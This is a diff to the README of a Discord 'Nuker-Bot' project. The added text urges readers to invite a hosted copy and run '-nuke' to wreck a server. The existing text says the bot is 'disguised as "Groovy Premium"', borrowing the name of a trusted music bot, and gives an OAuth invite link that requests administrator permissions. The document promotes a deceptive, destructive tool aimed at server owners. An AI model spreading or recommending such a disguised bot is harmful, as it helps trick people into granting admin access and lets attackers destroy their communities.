noah111121/Nuker-Bot/README.md

 ### Feature Ideas
 If you have an idea for a feature, please either put it as an issue, or join our discord server and tell us there!

+### Want no fuss and just to quickly nuke a server?
+We recommend you invite "Groovy Premium" using the link below and running `-nuke` in the server!
+Done!

 ### Groovy Premium
 Don't want to host one yourself?
 We host one disguised as "Groovy Premium".
 Invite Link: https://discord.com/api/oauth2/authorize?client_id=818853884495003689&permissions=8&scope=bot